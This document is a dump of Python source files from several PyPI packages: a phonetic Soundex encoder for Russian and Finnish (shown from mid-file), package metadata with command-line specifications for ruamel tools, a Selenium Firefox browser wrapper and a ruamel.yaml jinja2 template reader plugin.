_ere_ending = re.compile(r'(e[ae]r|ere)$', re.IGNORECASE)
_vowels = 'aeiouy'
_vowels_table = str.maketrans('aoeiyu', 'AABBBC')
_table = str.maketrans('bpfvcksgjqxzdtlmnr', '112233344555667889')
def _replace_vowels_seq(self, word):
word = self._ye_ending.sub('je', word)
word = self._au_ending.sub('o', word)
word = self._ea_ending.sub('e', word)
word = self._oo_ue_ew_ending.sub('u', word)
word = self._iey_ending.sub('ei', word)
word = self._iye_ire_ending.sub('ai', word)
word = self._ere_ending.sub('ie', word)
return word
def transform(self, word):
word = self._hw_replacement.sub('', word)
if self.code_vowels:
word = self._replace_vowels_seq(word)
return self._apply_soundex_algorithm(word)
class FinnishSoundex(Soundex):
"""
Soundex for Finnish language
"""
_ts_replacement = re.compile(r'ts', re.IGNORECASE)
_x_replacement = re.compile(r'x', re.IGNORECASE)
_vowels = 'aäeioöuy'
_vowels_table = str.maketrans('aäoeiöuy', 'AAABBBCC')
_table = str.maketrans('bpfvcszkgqdtlmnrj', '11223334445567789')
def transform(self, word):
word = self._ts_replacement.sub('s', word)
word = self._x_replacement.sub('ks', word)
return self._apply_soundex_algorithm(word)
class RussianSoundex(Soundex):
_vowels = 'аэиоуыеёюя'
_vowels_table = str.maketrans('аяоыиеёэюу', 'AAAABBBBCC')
_table = str.maketrans('бпвфгкхдтжшчщзсцлмнр', '11223334455556667889')
_ego_ogo_endings = re.compile(r'([ео])(г)(о$)', re.IGNORECASE)
_ia_ending = re.compile(r'[еи][ая]', re.IGNORECASE)
_ii_ending = re.compile(r'и[еио]', re.IGNORECASE)
_replacement_map = {
re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(я)', re.IGNORECASE): 'jа',
re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(ю)', re.IGNORECASE): 'jу',
re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(е)', re.IGNORECASE): 'jэ',
re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(ё)', re.IGNORECASE): 'jо',
re.compile(r'й', re.IGNORECASE): 'j',
re.compile(r'([тсзжцчшщ])([жцчшщ])', re.IGNORECASE): r'\2',
re.compile(r'(с)(т)([лнц])', re.IGNORECASE): r'\1\3',
re.compile(r'(н)([тд])(ств)', re.IGNORECASE): r'\1\3',
re.compile(r'([нс])([тд])(ск)', re.IGNORECASE): r'\1\3',
re.compile(r'(р)(д)([чц])', re.IGNORECASE): r'\1\3',
re.compile(r'(з)(д)([нц])', re.IGNORECASE): r'\1\3',
re.compile(r'(в)(ств)', re.IGNORECASE): r'\2',
re.compile(r'(л)(нц)', re.IGNORECASE): r'\2',
re.compile(r'[ъь]', re.IGNORECASE): '',
re.compile(r'([дт][зсц])', re.IGNORECASE): 'ц'
}
def __init__(self, delete_first_letter=False, delete_first_coded_letter=False,
delete_zeros=False, cut_result=False, seq_cutted_len=4,
code_vowels=False, use_morph_analysis=False):
"""
Initialization of Russian Soundex object
:param delete_first_letter:
:param delete_first_coded_letter:
:param delete_zeros:
:param code_vowels:
:param cut_result:
:param seq_cutted_len:
:param use_morph_analysis: use morphological grammems for phonemes analysis
:param code_vowels: group and code vowels as ABC letters
"""
super(RussianSoundex, self).__init__(delete_first_letter, delete_first_coded_letter,
delete_zeros, code_vowels, cut_result, seq_cutted_len)
self.use_morph_analysis = use_morph_analysis
self._moprh = pymorphy2.MorphAnalyzer()
def _replace_ego_ogo_endings(self, word):
return self._ego_ogo_endings.sub(r'\1в\3', word)
def _use_morph_for_phoneme_replace(self, word):
parse = self._moprh.parse(word)
if parse and ('ADJF' in parse[0].tag or 'NUMB' in parse[0].tag or 'NPRO' in parse[0].tag):
word = self._replace_ego_ogo_endings(word)
return word
def _replace_vowels_seq(self, word):
word = self._ii_ending.sub('и', word)
word = self._ia_ending.sub('я', word)
return word
def transform(self, word):
"""
Transforms a word into a sequence with coded phonemes
:param word: string
:return: Soundex string code
"""
if self.use_morph_analysis:
word = self._use_morph_for_phoneme_replace(word)
for replace, result in self._replacement_map.items():
word = replace.sub(result, word)
if self.code_vowels:
word = self._replace_vowels_seq(word)
return self._apply_soundex_algorithm(word) | /ru_soundex-1.1.1.tar.gz/ru_soundex-1.1.1/ru_soundex/soundex.py | 0.591015 | 0.243873 | soundex.py | pypi |
from __future__ import print_function
from __future__ import absolute_import
_package_data = dict(
full_package_name='ruamel.auto',
version_info=(1, 6, 4),
__version__='1.6.4',
version_timestamp='2022-09-21 10:06:53',
author='Anthon van der Neut',
author_email='a.van.der.neut@ruamel.eu',
description='automate testing and pep8 conformance of python code',
toxver=['2.7'],
entry_points='auto=ruamel.auto.__main__:main',
since=1998,
install_requires=['ruamel.yaml', 'ruamel.std.pathlib', 'ruamel.showoutput'],
universal=True,
)
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# - !Option [all, !Action store_true, !Help build sdist and wheels for all platforms]
# !PreSubparserOption, !PSO
# !Alias for a subparser
# - !DefaultSubparser # make this (one) subparser default
# !Help, !H
# !HelpWidth 40 # width of the left side column width option details
# !Argument, !Arg
# - !Arg [files, nargs: '*', !H files to process]
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Main # function to call/class to instantiate, no subparsers
# !Action # either one of the actions in cligen subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults ' (default: %(default)s)'
# !Prolog (sub-)parser prolog/description text (for multiline use | ), used as subparser !Help if not set
# !Epilog (sub-)parser epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !PSO [no-clear, !Action store_true, !Help test and clear between runs]
- !PSO [display, !Help test and clear + display file contents of DISPLAY]
- !PSO [show-pdf, !Action store_true, !Help show pdf file once (when auto-ing an .rst file)]
- !PSO [each, e, !Action store_true, !Help test and try each argument seperately]
- !PSO [testverbose, t, default: 0, !Action store_true, !Help add -v to py.test invocation]
- !PSO [pep8, p, !Action store_true, !Help run pep8 on all argument files]
- !PSO [flake8, !Action store_true, !Help run flake8 on all argument files]
- !PSO [proceed, P, !Action store_true, !Help proceed with command after running pep8/flake8]
- !PSO [todo-pdf, metavar: ID, !Help run todo --show-pdf on todo item %(metavar)s]
- !PSO [todo-html, metavar: ID, !Help run todo --show-html on todo item %(metavar)s]
- !PSO [stats, !Action store_true, !Help show statistics after run]
- !PSO [prof, !Action store_true, !Help 'run -m cProfile [-s time|--prof-arg]']
- !PSO [prof-arg, !Action append]
- !PSO [prof-lines, type: int, default: 30]
- !PSO [python2, py2, '2', !Action store_true, !Help run with python2]
- !PSO [python3, py3, '3', !Action store_true, !Help run with python3]
- !PSO [last, l, !Action store_true, !Help "this sets the command to the first previous command,\n from the bash commandline, that does not start with \"auto \".\n Normally used in order not to retype and/or quote something\n your tried\
\ just before. Set 'alias auto=\"history -a | auto\"'.\n "]
- !PSO [cligen, C, !Action store_true, !Help "run cligen, ignore change of __main__.py, so you can use 'auto --cligen -c xxx *.py'"]
- !PSO [errorexit, E, !Action store_true, !Help 'used to test autotest.py, stop processing further commands on error']
- !PSO [command, c, !Action append, !Help command to be run on changes (multiple)]
- !PSO [arg, !Action append, !Help arguments to pass to file to test]
- !Arg [filenames, nargs: '*']
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [quiet, q, !Help decrease verbosity level, !Action count, const: -1, nargs: 0]
- !PSO [no-auto-dev, !Help do not check and restart auto when **its** sources change]
- !Instance ruamel.auto.auto.Auto
""" # NOQA | /ruamel.auto-1.6.4.tar.gz/ruamel.auto-1.6.4/__init__.py | 0.534127 | 0.280099 | __init__.py | pypi |
from __future__ import print_function, absolute_import, division, unicode_literals
_package_data = dict(
full_package_name="ruamel.browser.server.selenium",
version_info=(0, 1, 2),
author="Anthon van der Neut",
author_email="a.van.der.neut@ruamel.eu",
description="selenium firefox browser plugin",
# keywords="",
entry_points=None,
license="MIT License",
since=2016,
status=u"β", # the package status on PyPI
install_requires=dict(
any=["ruamel.appconfig", "ruamel.std.argparse", "selenium", "ruamel.browser.server", ],
),
classifiers=[
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Internet :: WWW/HTTP",
],
)
def _convert_version(tup):
"""Create a PEP 386 pseudo-format conformant string from tuple tup."""
ret_val = str(tup[0]) # first is always digit
next_sep = "." # separator for next extension, can be "" or "."
for x in tup[1:]:
if isinstance(x, int):
ret_val += next_sep + str(x)
next_sep = '.'
continue
first_letter = x[0].lower()
next_sep = ''
if first_letter in 'abcr':
ret_val += 'rc' if first_letter == 'r' else first_letter
elif first_letter in 'pd':
ret_val += '.post' if first_letter == 'p' else '.dev'
return ret_val
version_info = _package_data['version_info']
__version__ = _convert_version(version_info)
del _convert_version
import os # NOQA
import time # NOQA
from glob import glob # NOQA
import selenium.common # NOQA
from selenium import webdriver # NOQA
from selenium.webdriver.common.action_chains import ActionChains # NOQA
from selenium.webdriver.support.ui import Select # NOQA
NSEE = selenium.common.exceptions.NoSuchElementException # NOQA
from ..browser import Browser, NoSuchElementException # NOQA
class SeleniumBrowser(Browser):
def __init__(self, name, **kw):
self._selenium = None
super(SeleniumBrowser, self).__init__(name, **kw)
@property
def br(self):
return self._selenium
def get(self, url, elem):
print(u'getting [{}]'.format(url))
self.br.get(url)
return ''
def keys(self, keys, elem, add=False):
if elem is None:
elem = '_'
if not add:
self._kw[elem].clear() # get rid of any previous non-recognised stuff
self._kw[elem].send_keys(keys)
return 'ok'
def find(self, msg, elem):
"""find [use top] [store key] id|class|css rest
if "use top" not provided search whole page
if "store key" not provided only store in _
rest can have spaces
"""
if elem is None:
elem = self.br
else:
elem = self._kw[elem]
try:
store_key = None
cmd, k, rest = msg.split(None, 2)
if cmd == u'store':
store_key = k
msg = rest
except ValueError:
pass
try:
typ, msg = msg.split(None, 1)
typ = typ.lower()
if typ == 'id':
res = elem.find_element_by_id(msg)
elif typ == 'class':
res = elem.find_element_by_class_name(msg)
elif typ == 'css':
res = elem.find_element_by_css_selector(msg)
else:
return "Not implemented: " + typ
if store_key:
self._kw[store_key] = res
self._kw['_'] = res
return 'ok'
except NSEE:
raise NoSuchElementException
except:
print('rbs.selenium general raising')
raise
def select(self, msg, elem):
"""select, first msg part is typ
"""
if elem is None:
elem = '_'
sel = Select(self._kw[elem])
typ, msg = msg.split(None, 1)
typ = typ.lower()
if typ == 'index':
res = sel.select_by_index(msg) # does this need an int or is str ok?
elif typ == 'text':
res = sel.select_by_visible_text(msg)
elif typ == 'value':
res = sel.select_by_visible_text(msg)
else:
return "Not implemented: " + typ
res = res
return 'ok'
def click(self, message, elem):
if elem is None:
elem = '_'
self._kw[elem].click()
def inner(self, msg, elem):
"""normally used with element previously found
msg part discarded
"""
if msg:
print('\nSeleniumBrowser.inner: unused {}\n'.format(msg))
if elem is None:
elem = '_'
return self._kw[elem].get_attribute('innerHTML')
def javascript(self, arg, elem):
return self.br.execute_script(arg)
def title(self, message, elem):
return self.br.title
def current_url(self, message, elem):
return self.br.current_url
def hover(self, message, elem): # untested
if elem is None:
elem = '_'
h = ActionChains(self._browser).move_to_element(self._kw[elem])
h.perform()
def mouse_down_up(self, elem):
if elem is None:
elem = '_'
action = ActionChains(self.br)
action.move_to_element(self._kw[elem])
action.click_and_hold()
try:
action.perform()
except:
pass
time.sleep(0.5)
action = ActionChains(self.br)
action.release()
action.perform()
down_up = mouse_down_up
downup = mouse_down_up
def findallid(self, message, elem):
res = []
if elem is None:
top = self.br
else:
top = self._kw[elem]
for elem in top.find_elements_by_css_selector(message):
res.append(elem.get_attribute('id'))
return ' '.join(res)
def displayed(self, message, elem):
if elem is None:
elem = '_'
return ('yes' if self._kw[elem].is_displayed() else 'no')
def quit(self):
self.br.quit()
# FirefoxSeleniumBrowser
class Browser(SeleniumBrowser):
def __init__(self, name, **kw):
super(SeleniumBrowser, self).__init__(name, **kw)
adblock_xpi = self.load_selenium_files('adblock/adblock_plus*.xpi')
if adblock_xpi:
try:
ffprofile = webdriver.FirefoxProfile(self.load_selenium_files('profile00'))
ffprofile.add_extension(adblock_xpi)
self._selenium = webdriver.Firefox(ffprofile)
return
except:
print('exception in loading adblock', adblock_xpi)
raise
self._selenium = webdriver.Firefox()
def load_selenium_files(self, pattern):
base_dirs = [os.environ.get('RBSSELENIUM')]
for base_dir in ['/data1', '/data0']:
base_dirs.append(os.path.join(base_dir, 'DATA', 'selenium'))
for base_dir in base_dirs:
pat = os.path.join(pattern)
# print('trying', pat)
res = glob(pat)
if res:
break
else:
return
return sorted(res)[-1] # the newest one if multiple | /ruamel.browser.server.selenium-0.1.2.tar.gz/ruamel.browser.server.selenium-0.1.2/__init__.py | 0.586049 | 0.151969 | __init__.py | pypi |
_package_data = dict(
full_package_name='ruamel.bws',
version_info=(0, 4, 1),
__version__='0.4.1',
version_timestamp='2021-11-06 08:30:19',
author='Anthon van der Neut',
description='browser restore to workspace',
keywords='browser multiple workspace restore',
author_email='a.van.der.neut@ruamel.eu',
# install_requires=[],
since=2014,
print_allowed=True,
classifiers=[
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Internet :: WWW/HTTP :: Browsers',
],
python_requires='>=3',
)
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# !PreSubparserOption, !PSO
# !Help, !H
# !Argument, !Arg
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Action # either one of the actions in subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults
# !Epilog epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [keep, !Help 'max number of old saves to keep (default: %(default)s)', type: int, default: 10]
- !Instance ruamel.bws.browserworkspace.BrowserWorkspace
- !Config [INI, ~/.config/bws/bws.ini] # path for backwards compatibility
- save:
- !Opt [minwin, m, default: 3, type: int, metavar: N, !Help 'minimum number of windows that needs to be open to create a new save file (default: %(default)s)']
- !Opt [force, !Action store_true, !Help override (configured) minwin setting]
- !Opt [unlock-file, default: '/tmp/bws.restored', metavar: FILE, !Help 'file that has to exist when doing bws save --check (default: %(default)s)']
- !Opt [check, !Action store_true, !Help exit if file specified with --unlock-file doesn't exist]
- !Help "save the current setup, purging old versions\n (based on --keep)"
- list:
- !Help list availabel workspace setups
- restore:
- !Arg [position, nargs: '?', type: int, default: 0]
- !Opt [unlock, !Action store_true, !Help create file specified by --unlock-file]
- !Opt [unlock-file, default: '/tmp/bws.restored', metavar: FILE, !Help 'file that has to exist when doing bws save --check (default: %(default)s)']
- !Help restore workspace setup (defaults to most recent)
""" # NOQA | /ruamel.bws-0.4.1.tar.gz/ruamel.bws-0.4.1/__init__.py | 0.540439 | 0.316567 | __init__.py | pypi |
_package_data = dict(
full_package_name='ruamel.music',
version_info=(0, 5, 0),
__version__='0.5.0',
version_timestamp='2022-09-25 12:37:15',
author='Anthon van der Neut',
author_email='a.van.der.neut@ruamel.eu',
description='handling of music files: conversion, playing',
toxver=['3.8'],
entry_points='music=ruamel.music.__main__:main',
install_requires=[
'mutagen',
'musicbrainzngs',
'ruamel.yaml',
'ruamel.doc.html',
'ruamel.std.pathlib',
],
license='Copyright Ruamel bvba 2013-2022',
print_allowed=True,
python_requires='>=3',
)
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# - !Option [all, !Action store_true, !Help build sdist and wheels for all platforms]
# !PreSubparserOption, !PSO
# !Alias for a subparser
# - !DefaultSubparser # make this (one) subparser default
# !Help, !H
# !HelpWidth 40 # width of the left side column width option details
# !Argument, !Arg
# - !Arg [files, nargs: '*', !H files to process]
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Main # function to call/class to instantiate, no subparsers
# !Action # either one of the actions in cligen subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults ' (default: %(default)s)'
# !Prolog (sub-)parser prolog/description text (for multiline use | ), used as subparser !Help if not set
# !Epilog (sub-)parser epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [quiet, q, !Action count, dest: verbose, const: -1, nargs: 0]
- !PSO [dryrun, !Action store_true]
- !Instance xxx.xxx.XXX
- convert:
- !Opt [cue, !Help split args according to cue file and convert]
- !Opt [no-cue-check, !Action store_true, !Help do not check if there is a matching cue file]
- !Opt [force, !Action store_true, !Help force conversion even if target exists]
- !Opt [re-tag, retag, !Action store_true, !Help copy tags to existing files]
- !Opt [max-size, type: int, default: 32, !Help 'max file size to convert (default: %(default)sMb)']
- !Arg [args, nargs: +, !Help music files to convert]
- !Help convert music file
- check:
- !Opt [convert, !Action store_true, !Help convert files checked to be older/missing]
- !Help check if primary secondary conversion is necessary
- find:
- !Opt [artist, !Action store_true, !Help only show artist level]
- !Opt [album, !Action store_true, !Help only show album level]
- !Arg [args, nargs: +, !Help list of elements of filename to be found]
- !Help find some music file in primary or secondary format
- sort:
- !Opt [convert, !Action store_true, !Help generate secondary format from primary]
- !Opt [test, !Action store_true]
- !Opt [startwith, !Help only sort if starting with path]
- !Help sort tmp directory to the primary and secondary format
- flatten:
- !Arg [args, nargs: '*', !Help 'list of directories to recursively parse (default: . )']
- !Help flatten pictures into music directory (for picard to move along)
- analyse:
- !Arg [args, nargs: '*', !Help 'list of directories to recursively parse (default: . )']
- !Help analyse a directory tree, to find music
- cleanup:
- !Opt [dedup, !Action store_true, !Help check and remove old paths in primary and secondary storage]
- !Opt [year, !Action store_true, !Help move albums to original year]
- !Opt [gen, !Action store_true, !Help generate year related metadata file]
- !Help cleanup empty directories, old path formats, etc.
- meta:
- !Arg [args, nargs: +, type: ruamel.std.pathlib.Path, !Help music files to process]
- !Help show tag metadata
- image:
- !Opt [from, type: ruamel.std.pathlib.Path, !Help music file to read image from]
- !Opt [to, type: ruamel.std.pathlib.Path, !Help music file to write to]
- !Opt [all, !Action store_true]
- !Opt [mp3, !Action store_true]
- !Opt [check, type: ruamel.std.pathlib.Path, nargs: +, !Help check dirs for cover art]
- !Opt [get, type: ruamel.std.pathlib.Path, nargs: +, !Help get file cover art]
- !Help copy image from to
- html:
- !Opt [force, !Action store_true, !Help force conversion even if up-to-date]
- !Help generate html from .music.yaml
""" # NOQA | /ruamel.music-0.5.0-py3-none-any.whl/ruamel/music/__init__.py | 0.471953 | 0.313591 | __init__.py | pypi |
from __future__ import print_function, absolute_import, division, unicode_literals
_package_data = dict(
full_package_name='ruamel.yaml.cmd',
version_info=(0, 6, 5),
__version__='0.6.5',
version_timestamp='2023-07-11 20:50:18',
author='Anthon van der Neut',
author_email='a.van.der.neut@ruamel.eu',
description='commandline utility to manipulate YAML files',
entry_points='yaml',
license='MIT',
since=2015,
nested=True,
install_requires=[
# 'ruamel.std.argparse>=0.8',
'configobj',
'ruamel.yaml.convert>=0.3',
'ruamel.yaml>=0.17.17',
'ruamel.yaml.base',
'lz4',
],
extras_require={'configobj': ['configobj']},
tox=dict(
env='3',
),
python_requires='>=3',
print_allowed=True,
)
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# !PreSubparserOption, !PSO
# !Help, !H
# !Argument, !Arg
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Action # either one of the actions in subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults
# !Epilog epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !AddDefaults
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, !Nargs 0, default: 0]
- !Opt [indent, metavar: IND, !Help 'set indent level (default: auto)']
- !Opt [bsi, dest: block_seq_indent, metavar: BLOCK_SEQ_IND, type: int, !Help 'set block sequence indent level (default: auto)']
# - !Opt [map_indent, metavar: M, type: int, !Help 'set indent level for mappings (default: auto)']
# - !Opt [seq_indent, metavar: M, type: int, !Help 'set indent level for sequences (default: auto)']
# - !Opt [offset, dest: seq_indicator_offset, metavar: OFFSET, type: int, !Help 'set block sequence indicator offset (default: auto), make sure there is enough space in the sequence indent']
# options for YAML output
- !Opt [flow, !Action store_true, !Help use flow-style YAML instead of block style]
- !Opt [semi, !Action store_true, !Help write block style YAML except for "leaf" mapping/dict]
- !Opt [literal, !Action store_true, !Help convert scalars with newlines to literal block style]
- !Opt [write, w, !Action store_true, !Help 'write individual .yaml files (reusing basename), instead of stdout']
- !Opt [output, o, metavar: OUT, !H 'write to file %(metavar)s instead of stdout']
- !Opt [smart-string, !Action store_true, !Help set literal block style on strings with \n otherwise plain if possible]
- !Instance ruamel.yaml.cmd.yaml_cmd.YAMLCommand
- rt:
- !Alias round-trip
- !Prolog round trip on YAML document, test if first or second round stabilizes document
- !Opt [save, !Action store_true, !Help "save the rewritten data back\n to the input file (if it doesn't exist a '.orig' backup will be made)\n "]
- !Opt [width, metavar: W, default: 80, type: int, !Help 'set width of output (default: %(default)s']
- !Arg [file, !Nargs +]
- !Help test round trip on YAML document
- me:
- !Alias merge-expand
- !Prolog expand merges in input file to output file
- !Opt [allow-anchors, !Action store_true, !Help allow "normal" anchors/aliases in output]
- !Arg [file, !Nargs 2]
- !Help expand merges in input file to output file
- json:
- !Alias from-json
- !Prolog convert JSON to block-style YAML
# - !Opt [flow, !Action store_true, !Help use flow-style instead of block style]
# - !Opt [semi, !Action store_true, !Help write block style except for "leaf" mapping/dict]
# - !Opt [literal, !Action store_true, !Help convert scalars with newlines to literal block style]
- !Opt [width, metavar: W, default: 80, type: int, !Help 'set width of output (default: %(default)s']
- !Opt [mozlz4, !Action store_true, !Help decode mozilla lz4]
# - !Opt [write, w, !Action store_true, !Help 'write a .yaml file, instead of stdout']
- !Arg [file, !Nargs +]
- !Help convert JSON to block-style YAML
- ini:
- !Alias from-ini
- !Prolog convert .ini/config file to block YAML
- !Opt [basename, b, !Action store_true, !Help 're-use basename of .ini file for .yaml file, instead of writing to stdout']
- !Opt [test, !Action store_true]
- !Arg [file]
- !Help convert .ini/config to block YAML
- pon:
- !Alias from-pon
- !Prolog convert .pon config file to block YAML
- !Arg [file, !Nargs +]
- !Help convert .pon config file to block YAML
- htmltable:
- !Prolog |
convert YAML to html tables. If hierarchy is two levels deep (
sequence/mapping over sequence/mapping) this is mapped to one table
If the hierarchy is three deep, a list of 2 deep tables is assumed, but
any non-list/mapp second level items are considered text.
Row level keys are inserted in first column (unless --no-row-key),
item level keys are used as classes for the TD.
- !Opt [level, !Action store_true, !Help 'print # levels and exit']
- !Opt [check]
- !Arg [file]
- !Help convert YAML to HTML tables
- from-html:
- !Prolog |
convert HTML to YAML. Tags become keys with as
value a list. The first item in the list is a key value pair with
key ".attribute" if attributes are available followed by tag and string
segment items. Lists with one item are by default flattened.
- !Opt [no-body, !Action store_true, !H drop top level html and body from HTML code segments]
- !Opt [strip, !Action store_true, !H strip whitespace surrounding strings]
- !Arg [file]
- !Help convert HTML to YAML
- from-csv:
- !Alias csv
- !Prolog |
convert CSV to YAML.
By default generates a sequence of rows, with the items in a 2nd level
sequence.
- !Opt [mapping, m, !Action store_true, !H 'generate sequence of mappings with first line as keys']
- !Opt [delimeter, metavar: DELIM, default: ',', !H 'field delimiter (default %(default)s)']
- !Opt [strip, !Action store_true, !H 'strip leading & trailing spaces from strings']
- !Opt [no-process, dest: process, !Action store_false,
!H 'do not try to convert elements into int/float/bool/datetime']
- !Arg [file]
- !Help convert CSV to YAML
- from-dirs:
- !Alias fromdirs
- !Prolog |
Combine multiple YAML files into one.
Path chunks (directories) are converted to mapping entries, the YAML contents
the value of the (last) key. If there are multiple files in one directory, the
filenames are used as well (or specify --use-file-name).
# - !Opt [output, o, !H 'write to file OUTPUT instead of stdout']
- !Opt [use-file-names, !Action store_true]
- !Opt [sequence, !Action store_true, !H 'no paths, each YAML content is made an element of a root level sequence']
- !Arg [file, !Nargs +, !H 'full path names (a/b/data.yaml)']
- !Help combine multiple YAML files into one
- pickle:
- !Alias [from-pickle, frompickle]
- !Prolog |
Load Python pickle file(s) and dump as YAML
- !Opt [create-to-yaml, !Action store_true, !Help create a tagged to_yaml method even if available]
- !Arg [file, !Nargs '*']
- !Help convert Python pickle file(s) to YAML
- mapping:
- !Alias map
# - !Opt [output, o, !Help write to file OUTPUT instead of stdout]
- !Arg [key, !Help key of the new root-level mapping]
- !Arg [file, !Help file with YAML content that will be value for key]
- !Help create new YAML file with at root a mapping with key and file content
- add:
- !Option ['parents', !Action store_true, !H create parents if necessary]
- !Option ['item', !Action store_true, !H 'create item']
- !Option ['key', !Action store_true, !H 'create key, even if not found in siblings of item']
- !Option ['str', !Action store_true, !H store value as string]
- !Option ['file', !H use FILE instead of first argument as YAML file]
- !Option ['value', !H use FILE instead of first argument as YAML file]
- !Option ['sep', !H set separator for splitting single element path]
- !Arg [args, !Nargs '*', !H '[file] path in yaml/path.in.yaml [value]']
- !Help add a value to a path in the data structure loaded from YAML
- !Prolog >
Add a value to a path in the data structure loaded from YAML.
Use value are resolved like in YAML, use --str if necessary
The value is the last args token.
The "path" in the data structure is taken from all other args,
interpreting numerical values as indices in list/seq.
E.g.:
yaml add --parents --value Windows test.yaml computers os type
yaml add --file test.yaml computers os secure false
yaml add --str test.yaml computers.os.year 2019
- sort:
- !Option ['file', !H use FILE instead of first argument as YAML file]
- !Arg [args, !Nargs '*', !H '[file] [path in yaml/path.in.yaml]']
- !Prolog |
Load the file, check if path leads to a mapping, sort by key
and write back. No path -> work on root of data structure.
File is not written if mapping is already in sorted order.
- !Help sort the keys of a mapping in a YAML file
- edit:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help Edit a YAML document, save over orginal only when loadable
- !Prolog >
Edits a copy of the file argument and only updates the file when the copy
is loadable YAML. The copy is not removed after exiting editor if not
parseable and used (if not older than the original file) to continue.
Copy is named .ye.<filename>
- tokens:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help show tokens
- events:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help show events
- generate:
- !Prolog |
generate a file filled with random YAML until it reaches size
- !Option [size, default: 10, !Help size in Kb]
- !Option [levels, !Help 'levels in file (e.g. sm_s1m) ']
- !Arg [file, !H 'name of the file to generate']
- analyse:
- !Option [typ, !Help YAML typ to create]
- !Option [pure, !Action store_true, !Help create pure YAML instance]
- !Arg [file, !H 'name of the file to load']
""" # NOQA | /ruamel.yaml.cmd-0.6.5-py3-none-any.whl/ruamel/yaml/cmd/__init__.py | 0.594434 | 0.218232 | __init__.py | pypi |
from __future__ import absolute_import, unicode_literals
import ruamel.yaml
if False: # MYPY
from typing import Any # NOQA
typ = 'jinja2'
class MyReader(ruamel.yaml.reader.Reader):
def __init__(self, stream, loader):
assert stream is None
assert loader is not None
ruamel.yaml.reader.Reader.__init__(self, stream, loader)
@property
def stream(self):
return ruamel.yaml.reader.Reader.stream.fget(self)
@stream.setter
def stream(self, val):
if val is None:
return ruamel.yaml.reader.Reader.stream.fset(self, val)
s = val.read() if hasattr(val, 'read') else val
reverse = {}
md = dict(reverse=reverse)
setattr(self.loader, '_plug_in_' + typ, md)
if_pat = ('{{- ', ' #<{- ')
if if_pat[0] in s:
s = s.replace(if_pat[0], if_pat[1])
if if_pat not in reverse:
reverse[if_pat[1]] = if_pat[0]
len = 1
for len in range(1, 10):
pat = '<' * len + '{'
if pat not in s:
s = s.replace('{{', pat)
reverse[pat] = '{{'
break
else:
raise NotImplementedError('could not find substitute pattern ' + pat)
len = 1
for len in range(1, 10):
pat = '#' * len + '%'
if pat not in s:
s = s.replace('{%', pat)
reverse[pat] = '{%'
break
else:
raise NotImplementedError('could not find substitute pattern ' + pat)
return ruamel.yaml.reader.Reader.stream.fset(self, s)
class Rewriter:
def __init__(self, out, md):
"""store what you need from the metadata"""
self.reverse = md['reverse']
self.out = out
def write(self, data):
"""here the reverse work is done and then written to the original stream"""
for k in self.reverse:
try:
data = data.replace(k, self.reverse[k])
except TypeError:
data = data.decode('utf-8')
data = data.replace(k, self.reverse[k])
self.out.write(data)
